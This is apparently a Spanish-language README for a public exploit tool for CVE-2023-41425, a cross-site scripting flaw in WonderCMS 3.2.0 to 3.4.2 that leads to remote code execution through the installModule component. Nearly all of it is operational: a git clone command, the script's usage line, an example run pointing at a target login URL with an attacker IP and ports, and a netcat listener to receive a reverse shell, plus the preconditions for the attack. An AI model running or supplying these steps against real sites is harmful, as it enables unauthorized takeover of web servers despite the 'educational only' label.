
CVE-2023-41425 - Vulnerabilidad de Cross Site Scripting en Wonder CMS v.3.2.0 hasta v.3.4.2 permite a un atacante remoto ejecutar código arbitrario mediante un script manipulado cargado en el componente installModule.
Vulnerabilidad de Cross Site Scripting en Wonder CMS v.3.2.0 hasta v.3.4.2 permite a un atacante remoto ejecutar código arbitrario mediante un script manipulado cargado en el componente installModule. Solo con fines educativos
Requiere conocimiento del loginURL, acceso de administrador o la capacidad de hacer que el administrador haga clic en el enlace XSS.
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

prodigiousMind por descubrir e informar la vulnerabilidad https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413